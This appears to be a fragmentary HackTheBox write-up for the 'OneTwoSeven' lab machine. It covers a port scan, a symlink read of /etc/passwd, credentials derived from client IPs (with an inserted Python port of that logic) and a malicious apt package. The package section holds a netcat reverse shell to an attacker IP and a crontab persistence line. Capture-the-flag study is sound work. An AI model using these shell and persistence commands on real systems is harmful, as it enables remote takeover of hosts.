OneTwoSeven — HackTheBox Machine Writeup

First HackTheBox Machine Writeup!

Reconnaissance

Nmap scan report for 10.10.10.133
Host is up (0.31s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 48:6c:93:34:16:58:05:eb:9a:e5:5b:96:b6:d5:14:aa (RSA)
| 256 32:b7:f3:e2:6d:ac:94:3e:6f:11:d8:05:b9:69:58:45 (ECDSA)
|_ 256 35:52:04:dc:32:69:1a:b7:52:76:06:e3:6c:17:1e:ad (ED25519)
80/tcp open http Apache httpd 2.4.25 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Page moved.
60080/tcp filtered unknown
SFTP? So that explains the open port 22
ooh. nifty!
featuring a wall

Enumeration

ln -s /etc/passwd passwd_ln
ots-yODc2NGQ:x:999:999:127.0.0.1:/home/web/ots-yODc2NGQ:/bin/false
ots-3YzMyNDk:x:1001:1001:10.10.x.x:/home/web/ots-3YzMyNDk:/bin/false
...
<?php
function username() { $ip = $_SERVER['REMOTE_ADDR']; return "ots-" . substr(str_replace('=','',base64_encode(substr(md5($ip),0,8))),3); }
function password() { $ip = $_SERVER['REMOTE_ADDR']; return substr(md5($ip),0,8); }
?>
...
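As an added example (not part of the writeup and not the box's own code), here is a Python port of the two PHP functions above, run against the quoted passwd entries: it shows that the SFTP username and password are both deterministic functions of the client IP stored in the GECOS field, which is why an account's credentials can be recomputed from a known IP. The passwd sample is constructed from the lines quoted above; the function names are my own.

```python
import base64
import hashlib
import ipaddress

# Constructed sample input: the two /etc/passwd entries quoted in the writeup.
PASSWD_SAMPLE = (
    "ots-yODc2NGQ:x:999:999:127.0.0.1:/home/web/ots-yODc2NGQ:/bin/false\n"
    "ots-3YzMyNDk:x:1001:1001:10.10.x.x:/home/web/ots-3YzMyNDk:/bin/false\n"
)


def derive_username(ip: str) -> str:
    """Port of the PHP username(): 'ots-' + base64(md5(ip)[:8]) with '=' removed
    and the first three characters dropped."""
    digest8 = hashlib.md5(ip.encode()).hexdigest()[:8]
    encoded = base64.b64encode(digest8.encode()).decode().replace("=", "")
    return "ots-" + encoded[3:]


def derive_password(ip: str) -> str:
    """Port of the PHP password(): the first 8 hex characters of md5(ip)."""
    return hashlib.md5(ip.encode()).hexdigest()[:8]


def parse_passwd(text: str) -> dict:
    """Map account name -> GECOS field (which on this box holds the client IP)."""
    accounts = {}
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) == 7:
            accounts[fields[0]] = fields[4]
    return accounts


def audit_accounts(text: str) -> dict:
    """For each account: True if the username re-derives from its GECOS IP,
    False if it does not, None if the GECOS is not a parseable IPv4 address."""
    results = {}
    for name, gecos in parse_passwd(text).items():
        try:
            ip = str(ipaddress.IPv4Address(gecos))
        except ValueError:
            results[name] = None  # e.g. the redacted "10.10.x.x" entry
            continue
        results[name] = derive_username(ip) == name
    return results


if __name__ == "__main__":
    for name, ok in audit_accounts(PASSWD_SAMPLE).items():
        state = "undetermined" if ok is None else ("derivable from GECOS IP" if ok else "mismatch")
        print(name, state)
```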

USER.TXT

...
if ($_POST['username'] == 'ots-admin' && hash('sha256',$_POST['password']) == '11c5a42c9d74d5442ef3cc835bda1b3e7cc7f494e704a10d0de426b2fbe5cbd8') {
if (isset($_POST['login']) && !empty($_POST['username']) && !empty($_POST['password'])) {
...
<?php session_start(); if (isset ($_SESSION['username'])) { header("Location: /menu.php"); } ?>
<?php if ( $_SERVER['SERVER_PORT'] != 60080 ) { die(); } ?>
127.0.0.1/addons/ots-man-addon.php/addon-upload.php
127.0.0.1/addons/ots-man-addon.php/addons/ots-man-addon.php 
127.0.0.1/addon-download.php/addon-upload.php
127.0.0.1/addons/ots-man-addon.php/addon-upload.php
/usr/bin/apt-get update
/usr/bin/apt-get upgrade

Weaponization

MITM Setup

Crafting the Evil Package

#!/bin/bash
nc -e /bin/bash 10.10.14.48 7070
crontab -l | { cat; echo "* * * * * /usr/sbin/nano_update "; } | crontab -
nc -e /bin/bash 10.10.14.48 7070

Delivery + Exploitation

ROOT.TXT
